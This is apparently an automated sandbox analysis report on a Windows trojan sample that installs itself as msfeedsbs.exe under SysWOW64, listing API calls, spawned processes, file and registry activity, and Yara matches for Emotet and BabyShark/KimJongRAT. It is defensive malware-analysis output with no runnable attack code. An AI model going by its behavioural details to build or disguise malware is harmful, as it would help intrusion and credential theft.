                Source: svchost.exe, 0000000C.00000003.305707964.0000017351440000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r=
                Source: svchost.exe, 0000000C.00000003.281205822.0000017351432000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=
                Source: svchost.exe, 0000000C.00000002.306422023.000001735143B000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.tiles.virtualearth.net/tiles/gen
                Source: svchost.exe, 0000000C.00000002.306452776.000001735144E000.00000004.00000001.sdmpString found in binary or memory: https://t0.tiles.ditu.live.com/tiles/gen
                Source: svchost.exe, 00000004.00000002.500442562.000002116DE0E000.00000004.00000001.sdmp, svchost.exe, 00000016.00000002.404505748.0000019D2DF13000.00000004.00000001.sdmpString found in binary or memory: https://www.digicert.com/CPS0
                Source: msfeedsbs.exeString found in binary or memory: https://www.google.com/accounts/servicelogin
                Source: svchost.exe, 00000016.00000003.390656164.0000019D2DF9B000.00000004.00000001.sdmp, svchost.exe, 00000016.00000003.390583328.0000019D2DF69000.00000004.00000001.sdmpString found in binary or memory: https://www.hotspotshield.com/terms/
                Source: svchost.exe, 00000016.00000003.390656164.0000019D2DF9B000.00000004.00000001.sdmp, svchost.exe, 00000016.00000003.390583328.0000019D2DF69000.00000004.00000001.sdmpString found in binary or memory: https://www.pango.co/privacy
                Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
                Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.9370.3972.exeCode function: 0_2_00401131 SendMessageA,GetKeyState,GetKeyState,IsClipboardFormatAvailable,OpenClipboard,GetClipboardData,GlobalLock,CloseClipboard,0_2_00401131
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.9370.3972.exeCode function: 0_2_00401131 SendMessageA,GetKeyState,GetKeyState,IsClipboardFormatAvailable,OpenClipboard,GetClipboardData,GlobalLock,CloseClipboard,0_2_00401131
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.9370.3972.exeCode function: 0_2_0044082C GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageA,0_2_0044082C
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.9370.3972.exeCode function: 0_2_004528D7 GetKeyState,GetKeyState,GetKeyState,GetFocus,GetDesktopWindow,SendMessageA,0_2_004528D7
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.9370.3972.exeCode function: 0_2_004528EC GetKeyState,GetKeyState,GetKeyState,GetFocus,GetDesktopWindow,SendMessageA,SendMessageA,GetParent,0_2_004528EC
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.9370.3972.exeCode function: 0_2_0043CDD3 GetKeyState,GetKeyState,GetKeyState,GetKeyState,0_2_0043CDD3
                Source: C:\Windows\SysWOW64\msi\msfeedsbs.exeCode function: 1_2_0044082C GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageA,1_2_0044082C
                Source: C:\Windows\SysWOW64\msi\msfeedsbs.exeCode function: 1_2_004528D7 GetKeyState,GetKeyState,GetKeyState,GetFocus,GetDesktopWindow,SendMessageA,1_2_004528D7
                Source: C:\Windows\SysWOW64\msi\msfeedsbs.exeCode function: 1_2_004528EC GetKeyState,GetKeyState,GetKeyState,GetFocus,GetDesktopWindow,SendMessageA,SendMessageA,GetParent,1_2_004528EC
                Source: C:\Windows\SysWOW64\msi\msfeedsbs.exeCode function: 1_2_0043CDD3 GetKeyState,GetKeyState,GetKeyState,GetKeyState,1_2_0043CDD3

                E-Banking Fraud:

                Emotet Banking Trojan found
                Source: unknown | Process created: C:\Windows\SysWOW64\msi\msfeedsbs.exe 'C:\Windows\SysWOW64\msi\msfeedsbs.exe' /scomma 'C:\Users\user\AppData\Local\Temp\D0A6.tmp'
                Source: unknown | Process created: C:\Windows\SysWOW64\msi\msfeedsbs.exe 'C:\Windows\SysWOW64\msi\msfeedsbs.exe' /scomma 'C:\Users\user\AppData\Local\Temp\D402.tmp'
                Source: C:\Windows\SysWOW64\msi\msfeedsbs.exe | Process created: C:\Windows\SysWOW64\msi\msfeedsbs.exe 'C:\Windows\SysWOW64\msi\msfeedsbs.exe' /scomma 'C:\Users\user\AppData\Local\Temp\D0A6.tmp'
                Source: C:\Windows\SysWOW64\msi\msfeedsbs.exe | Process created: C:\Windows\SysWOW64\msi\msfeedsbs.exe 'C:\Windows\SysWOW64\msi\msfeedsbs.exe' /scomma 'C:\Users\user\AppData\Local\Temp\D402.tmp'
                Yara detected Emotet
                Source: Yara match | File source: 00000000.00000002.231168035.0000000002251000.00000020.00000001.sdmp, type: MEMORY
                Source: Yara match | File source: 00000001.00000003.270006445.0000000003A99000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara match | File source: 00000001.00000003.266563770.000000000284D000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara match | File source: 00000001.00000002.503038920.0000000003E20000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara match | File source: 00000001.00000002.502949640.0000000003C70000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara match | File source: 00000001.00000002.498794424.00000000024A1000.00000020.00000001.sdmp, type: MEMORY
                Source: Yara match | File source: 00000001.00000002.502327978.0000000003400000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara match | File source: 00000001.00000003.267006289.0000000002893000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara match | File source: 00000000.00000002.231153327.0000000002240000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara match | File source: 00000001.00000003.269875775.00000000039FD000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara match | File source: 00000001.00000002.498766508.0000000002490000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara match | File source: 1.2.msfeedsbs.exe.3e20000.9.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 1.2.msfeedsbs.exe.3c70000.8.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 1.2.msfeedsbs.exe.3400000.3.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 1.2.msfeedsbs.exe.3e20000.9.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 1.2.msfeedsbs.exe.3c70000.8.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 1.2.msfeedsbs.exe.3400000.3.unpack, type: UNPACKEDPE

                System Summary:

                Malicious sample detected (through community Yara rule)
                Source: 00000009.00000002.274549880.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Detects BabyShark KimJongRAT Author: Florian Roth
                Source: 00000001.00000003.278055730.0000000003FF0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Detects BabyShark KimJongRAT Author: Florian Roth
                Source: 00000009.00000001.273628846.0000000000400000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Detects BabyShark KimJongRAT Author: Florian Roth
                Source: 9.2.msfeedsbs.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects BabyShark KimJongRAT Author: Florian Roth
                Source: 1.3.msfeedsbs.exe.3ff0000.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects BabyShark KimJongRAT Author: Florian Roth
                Source: 1.3.msfeedsbs.exe.3ff0000.1.unpack, type: UNPACKEDPE | Matched rule: Detects BabyShark KimJongRAT Author: Florian Roth
                Source: 9.1.msfeedsbs.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects BabyShark KimJongRAT Author: Florian Roth
                Source: 9.1.msfeedsbs.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detects BabyShark KimJongRAT Author: Florian Roth
                Source: 9.2.msfeedsbs.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detects BabyShark KimJongRAT Author: Florian Roth
                Source: C:\Windows\SysWOW64\msi\msfeedsbs.exe | Code function: 7_2_0040A5A9 memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,FindCloseChangeNotification,_wcsicmp,FindCloseChangeNotification, | 7_2_0040A5A9
                Source: C:\Windows\SysWOW64\msi\msfeedsbs.exe | Code function: 7_1_0040A5A9 memset,CreateFileW,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,FindCloseChangeNotification,_wcsicmp,FindCloseChangeNotification, | 7_1_0040A5A9
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.9370.3972.exe | File created: C:\Windows\SysWOW64\msi\
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.9370.3972.exe | File deleted: C:\Windows\SysWOW64\msi\msfeedsbs.exe:Zone.Identifier
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.9370.3972.exe | Code function: 0_2_0041A0B6 | 0_2_0041A0B6
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.9370.3972.exe | Code function: 0_2_004102C6 | 0_2_004102C6
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.9370.3972.exe | Code function: 0_2_004104A3 | 0_2_004104A3
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.9370.3972.exe | Code function: 0_2_0042A590 | 0_2_0042A590
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.9370.3972.exe | Code function: 0_2_0043F513 | 0_2_0043F513
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.9370.3972.exe | Code function: 0_2_00421A1F | 0_2_00421A1F
                Source: C:\Windows\SysWOW64\msi\msfeedsbs.exe | Code function: 1_2_0041A0B6 | 1_2_0041A0B6
                Source: C:\Windows\SysWOW64\msi\msfeedsbs.exe | Code function: 1_2_004102C6 | 1_2_004102C6
                Source: C:\Windows\SysWOW64\msi\msfeedsbs.exe | Code function: 1_2_004104A3 | 1_2_004104A3
                Source: C:\Windows\SysWOW64\msi\msfeedsbs.exe | Code function: 1_2_0042A590 | 1_2_0042A590
                Source: C:\Windows\SysWOW64\msi\msfeedsbs.exe | Code function: 1_2_0043F513 | 1_2_0043F513
                Source: C:\Windows\SysWOW64\msi\msfeedsbs.exe | Code function: 1_2_00421A1F | 1_2_00421A1F
                Source: C:\Windows\SysWOW64\msi\msfeedsbs.exe | Code function: 6_2_004038A5 | 6_2_004038A5
                Source: C:\Windows\SysWOW64\msi\msfeedsbs.exe | Code function: 6_2_00409470 | 6_2_00409470
                Source: C:\Windows\SysWOW64\msi\msfeedsbs.exe | Code function: 6_2_0040123E | 6_2_0040123E
                Source: C:\Windows\SysWOW64\msi\msfeedsbs.exe | Code function: 6_2_004010B4 | 6_2_004010B4
                Source: C:\Windows\SysWOW64\msi\msfeedsbs.exe | Code function: 6_2_0040C0BC | 6_2_0040C0BC
                Source: C:\Windows\SysWOW64\msi\msfeedsbs.exe | Code function: 6_2_00409F54 | 6_2_00409F54
                Source: C:\Windows\SysWOW64\msi\msfeedsbs.exe | Code function: 6_2_00408325 | 6_2_00408325
                Source: C:\Windows\SysWOW64\msi\msfeedsbs.exe | Code function: 6_2_004099E2 | 6_2_004099E2
                Source: C:\Windows\SysWOW64\msi\msfeedsbs.exe | Code function: 6_2_0040B1F7 | 6_2_0040B1F7
                Source: C:\Windows\SysWOW64\msi\msfeedsbs.exe | Code function: 6_1_004038A5 | 6_1_004038A5
                Source: C:\Windows\SysWOW64\msi\msfeedsbs.exe | Code function: 6_1_00409470 | 6_1_00409470
                Source: C:\Windows\SysWOW64\msi\msfeedsbs.exe | Code function: 6_1_0040123E | 6_1_0040123E
                Source: C:\Windows\SysWOW64\msi\msfeedsbs.exe | Code function: 6_1_004010B4 | 6_1_004010B4
                Source: C:\Windows\SysWOW64\msi\msfeedsbs.exe | Code function: 6_1_0040C0BC | 6_1_0040C0BC
                Source: C:\Windows\SysWOW64\msi\msfeedsbs.exe | Code function: 6_1_00409F54 | 6_1_00409F54
                Source: C:\Windows\SysWOW64\msi\msfeedsbs.exe | Code function: 6_1_00408325 | 6_1_00408325
                Source: C:\Windows\SysWOW64\msi\msfeedsbs.exe | Code function: 6_1_004099E2 | 6_1_004099E2
                Source: C:\Windows\SysWOW64\msi\msfeedsbs.exe | Code function: 6_1_0040B1F7 | 6_1_0040B1F7
                Source: C:\Windows\SysWOW64\msi\msfeedsbs.exe | Code function: 7_2_004360CE | 7_2_004360CE
                Source: C:\Windows\SysWOW64\msi\msfeedsbs.exe | Code function: 7_2_0040509C | 7_2_0040509C
                Source: C:\Windows\SysWOW64\msi\msfeedsbs.exe | Code function: 7_2_00405199 | 7_2_00405199
                Source: C:\Windows\SysWOW64\msi\msfeedsbs.exe | Code function: 7_2_0043C2D0 | 7_2_0043C2D0
                Source: C:\Windows\SysWOW64\msi\msfeedsbs.exe | Code function: 7_2_00440406 | 7_2_00440406
                Source: C:\Windows\SysWOW64\msi\msfeedsbs.exe | Code function: 7_2_0040451D | 7_2_0040451D
                Source: C:\Windows\SysWOW64\msi\msfeedsbs.exe | Code function: 7_2_004045FF | 7_2_004045FF
                Source: C:\Windows\SysWOW64\msi\msfeedsbs.exe | Code function: 7_2_0040458E | 7_2_0040458E
                Source: C:\Windows\SysWOW64\msi\msfeedsbs.exe | Code function: 7_2_00404690 | 7_2_00404690
                Source: C:\Windows\SysWOW64\msi\msfeedsbs.exe | Code function: 7_2_00414A51 | 7_2_00414A51
                Source: C:\Windows\SysWOW64\msi\msfeedsbs.exe | Code function: 7_2_00404C08 | 7_2_00404C08
                Source: C:\Windows\SysWOW64\msi\msfeedsbs.exe | Code function: 7_2_00406C8E | 7_2_00406C8E
                Source: C:\Windows\SysWOW64\msi\msfeedsbs.exe | Code function: 7_2_00415DF3 | 7_2_00415DF3
                Source: C:\Windows\SysWOW64\msi\msfeedsbs.exe | Code function: 7_2_00416E5C | 7_2_00416E5C
                Source: C:\Windows\SysWOW64\msi\msfeedsbs.exe | Code function: 7_2_00410FE4 | 7_2_00410FE4
                Source: C:\Windows\SysWOW64\msi\msfeedsbs.exe | Code function: 7_1_004360CE | 7_1_004360CE
                Source: C:\Windows\SysWOW64\msi\msfeedsbs.exe | Code function: 7_1_0040509C | 7_1_0040509C
                Source: C:\Windows\SysWOW64\msi\msfeedsbs.exe | Code function: 7_1_00405199 | 7_1_00405199
                Source: C:\Windows\SysWOW64\msi\msfeedsbs.exe | Code function: 7_1_0043C2D0 | 7_1_0043C2D0
                Source: C:\Windows\SysWOW64\msi\msfeedsbs.exe | Code function: 7_1_00440406 | 7_1_00440406
                Source: C:\Windows\SysWOW64\msi\msfeedsbs.exe | Code function: 7_1_0040451D | 7_1_0040451D
                Source: C:\Windows\SysWOW64\msi\msfeedsbs.exe | Code function: 7_1_004045FF | 7_1_004045FF
                Source: C:\Windows\SysWOW64\msi\msfeedsbs.exe | Code function: 7_1_0040458E | 7_1_0040458E
                Source: C:\Windows\SysWOW64\msi\msfeedsbs.exe | Code function: 7_1_00404690 | 7_1_00404690
                Source: C:\Windows\SysWOW64\msi\msfeedsbs.exe | Code function: 7_1_00414A51 | 7_1_00414A51
                Source: C:\Windows\SysWOW64\msi\msfeedsbs.exe | Code function: 7_1_00404C08 | 7_1_00404C08
                Source: C:\Windows\SysWOW64\msi\msfeedsbs.exe | Code function: 7_1_00406C8E | 7_1_00406C8E
                Source: C:\Windows\SysWOW64\msi\msfeedsbs.exe | Code function: 7_1_00415DF3 | 7_1_00415DF3
                Source: C:\Windows\SysWOW64\msi\msfeedsbs.exe | Code function: 7_1_00416E5C | 7_1_00416E5C
                Source: C:\Windows\SysWOW64\msi\msfeedsbs.exe | Code function: 9_2_00404DE5 | 9_2_00404DE5
                Source: C:\Windows\SysWOW64\msi\msfeedsbs.exe | Code function: 9_2_00404E56 | 9_2_00404E56
                Source: C:\Windows\SysWOW64\msi\msfeedsbs.exe | Code function: 9_2_00404EC7 | 9_2_00404EC7
                Source: C:\Windows\SysWOW64\msi\msfeedsbs.exe | Code function: 9_2_00404F58 | 9_2_00404F58
                Source: C:\Windows\SysWOW64\msi\msfeedsbs.exe | Code function: 9_2_0040BF6B | 9_2_0040BF6B
                Source: C:\Windows\SysWOW64\msi\msfeedsbs.exe | Code function: 9_1_00404DE5 | 9_1_00404DE5
                Source: C:\Windows\SysWOW64\msi\msfeedsbs.exe | Code function: 9_1_00404E56 | 9_1_00404E56
                Source: C:\Windows\SysWOW64\msi\msfeedsbs.exe | Code function: 9_1_00404EC7 | 9_1_00404EC7
                Source: C:\Windows\SysWOW64\msi\msfeedsbs.exe | Code function: 9_1_00404F58 | 9_1_00404F58
                Source: C:\Windows\SysWOW64\msi\msfeedsbs.exe | Code function: 9_1_0040BF6B | 9_1_0040BF6B
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.9370.3972.exe | Code function: String function: 004134C8 appears 275 times
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.9370.3972.exe | Code function: String function: 00412B98 appears 48 times
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.9370.3972.exe | Code function: String function: 00455D09 appears 38 times
                Source: C:\Windows\SysWOW64\msi\msfeedsbs.exe | Code function: String function: 004134C8 appears 277 times
                Source: C:\Windows\SysWOW64\msi\msfeedsbs.exe | Code function: String function: 00444C5E appears 36 times
                Source: C:\Windows\SysWOW64\msi\msfeedsbs.exe | Code function: String function: 004053C5 appears 34 times
                Source: C:\Windows\SysWOW64\msi\msfeedsbs.exe | Code function: String function: 0040924D appears 57 times
                Source: C:\Windows\SysWOW64\msi\msfeedsbs.exe | Code function: String function: 0042FF22 appears 32 times
                Source: C:\Windows\SysWOW64\msi\msfeedsbs.exe | Code function: String function: 004166E8 appears 68 times
                Source: C:\Windows\SysWOW64\msi\msfeedsbs.exe | Code function: String function: 00416A91 appears 174 times
                Source: C:\Windows\SysWOW64\msi\msfeedsbs.exe | Code function: String function: 00455D09 appears 38 times
                Source: C:\Windows\SysWOW64\msi\msfeedsbs.exe | Code function: String function: 00404880 appears 42 times
                Source: C:\Windows\SysWOW64\msi\msfeedsbs.exe | Code function: String function: 00445190 appears 70 times
                Source: C:\Windows\SysWOW64\msi\msfeedsbs.exe | Code function: String function: 00416849 appears 127 times
                Source: C:\Windows\SysWOW64\msi\msfeedsbs.exe | Code function: String function: 00412360 appears 36 times
                Source: C:\Windows\SysWOW64\msi\msfeedsbs.exe | Code function: String function: 00444C70 appears 40 times
                Source: C:\Windows\SysWOW64\msi\msfeedsbs.exe | Code function: String function: 00412084 appears 78 times
                Source: C:\Windows\SysWOW64\msi\msfeedsbs.exe | Code function: String function: 00411FF2 appears 36 times
                Source: C:\Windows\SysWOW64\msi\msfeedsbs.exe | Code function: String function: 00412072 appears 32 times
                Source: C:\Windows\SysWOW64\msi\msfeedsbs.exe | Code function: String function: 00412B98 appears 48 times
                Source: SecuriteInfo.com.Trojan.DownLoader34.9370.3972.exe | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                Source: msfeedsbsoe.exe.1.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                Source: msfeedsbsoe.exe.1.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                Source: msfeedsbsoe.exe.1.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                Source: SecuriteInfo.com.Trojan.DownLoader34.9370.3972.exe, 00000000.00000002.230625431.0000000000493000.00000002.00020000.sdmp | Binary or memory string: OriginalFilenameCHexEditDemo.EXER vs SecuriteInfo.com.Trojan.DownLoader34.9370.3972.exe
                Source: SecuriteInfo.com.Trojan.DownLoader34.9370.3972.exe, 00000000.00000002.231146677.0000000002230000.00000002.00000001.sdmp | Binary or memory string: OriginalFilenameuser32j% vs SecuriteInfo.com.Trojan.DownLoader34.9370.3972.exe
                Source: SecuriteInfo.com.Trojan.DownLoader34.9370.3972.exe, 00000000.00000002.232454394.0000000003040000.00000002.00000001.sdmp | Binary or memory string: originalfilename vs SecuriteInfo.com.Trojan.DownLoader34.9370.3972.exe
                Source: SecuriteInfo.com.Trojan.DownLoader34.9370.3972.exe, 00000000.00000002.232454394.0000000003040000.00000002.00000001.sdmp | Binary or memory string: OriginalFilenamepropsys.dll.mui@ vs SecuriteInfo.com.Trojan.DownLoader34.9370.3972.exe
                Source: SecuriteInfo.com.Trojan.DownLoader34.9370.3972.exe, 00000000.00000002.231993276.0000000002F40000.00000002.00000001.sdmp | Binary or memory string: System.OriginalFileName vs SecuriteInfo.com.Trojan.DownLoader34.9370.3972.exe
                Source: SecuriteInfo.com.Trojan.DownLoader34.9370.3972.exe | Binary or memory string: OriginalFilenameCHexEditDemo.EXER vs SecuriteInfo.com.Trojan.DownLoader34.9370.3972.exe
                Source: 00000009.00000002.274549880.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
                Source: 00000001.00000003.278055730.0000000003FF0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
                Source: 00000009.00000001.273628846.0000000000400000.00000040.00020000.sdmp, type: MEMORY | Matched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
                Source: 9.2.msfeedsbs.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
                Source: 1.3.msfeedsbs.exe.3ff0000.1.raw.unpack, type: UNPACKEDPE | Matched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
                Source: 1.3.msfeedsbs.exe.3ff0000.1.unpack, type: UNPACKEDPE | Matched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
                Source: 9.1.msfeedsbs.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
                Source: 9.1.msfeedsbs.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
                Source: 9.2.msfeedsbs.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
                Source: classification engine | Classification label: mal100.phis.bank.troj.spyw.evad.winEXE@25/7@0/5
                Source: C:\Windows\SysWOW64\msi\msfeedsbs.exe | Code function: 7_2_004183B8 GetLastError,FormatMessageW,FormatMessageA,LocalFree,free, | 7_2_004183B8
                Source: C:\Windows\SysWOW64\msi\msfeedsbs.exe | Code function: 7_2_00418842 GetDiskFreeSpaceW,GetDiskFreeSpaceA,free, | 7_2_00418842
                Source: C:\Windows\SysWOW64\msi\msfeedsbs.exe | Code function: 7_2_00413C19 CreateToolhelp32Snapshot,memset,Process32FirstW,OpenProcess,memset,GetModuleHandleW,GetProcAddress,FindCloseChangeNotification,free,Process32NextW,FindCloseChangeNotification, | 7_2_00413C19
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.9370.3972.exe | Code function: 0_2_0046392F CoCreateInstance,CoCreateInstance,CoCreateInstance,OleRun, | 0_2_0046392F
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.9370.3972.exe | Code function: 0_2_0043DBEF __EH_prolog,FindResourceA,LoadResource,LockResource,IsWindowEnabled,EnableWindow,EnableWindow,GetActiveWindow,SetActiveWindow, | 0_2_0043DBEF
                Source: C:\Windows\SysWOW64\msi\msfeedsbs.exe | File created: C:\Users\user\AppData\Local\Microsoft\Outlook
                Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:5912:120:WilError_01
                Source: C:\Windows\SysWOW64\msi\msfeedsbs.exe | File created: C:\Users\user\AppData\Local\Temp\CB36.tmp
                Source: C:\Windows\SysWOW64\msi\msfeedsbs.exe | Command line argument: ~`@ | 6_2_00405FD0
                Source: C:\Windows\SysWOW64\msi\msfeedsbs.exe | Command line argument: ~`@ | 6_2_00405FD0
                Source: C:\Windows\SysWOW64\msi\msfeedsbs.exe | Command line argument: ~`@ | 6_1_00405FD0
                Source: SecuriteInfo.com.Trojan.DownLoader34.9370.3972.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                Source: C:\Windows\SysWOW64\msi\msfeedsbs.exe | System information queried: HandleInformation
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.9370.3972.exe | File read: C:\Users\desktop.ini
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.9370.3972.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: C:\Windows\System32\svchost.exe | File read: C:\Windows\System32\drivers\etc\hosts
                Source: C:\Windows\System32\svchost.exe | File read: C:\Windows\System32\drivers\etc\hosts
                Source: C:\Windows\System32\svchost.exe | File read: C:\Windows\System32\drivers\etc\hosts
                Source: C:\Windows\System32\svchost.exe | File read: C:\Windows\System32\drivers\etc\hosts
                Source: msfeedsbs.exe | Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
                Source: msfeedsbs.exe | Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
                Source: msfeedsbs.exe, 00000001.00000003.279002576.00000000039FD000.00000004.00000001.sdmp, msfeedsbs.exe, 00000007.00000002.277303523.0000000000400000.00000040.00000001.sdmp | Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
                Source: msfeedsbs.exeBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
                Source: msfeedsbs.exeBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
                Source: msfeedsbs.exeBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
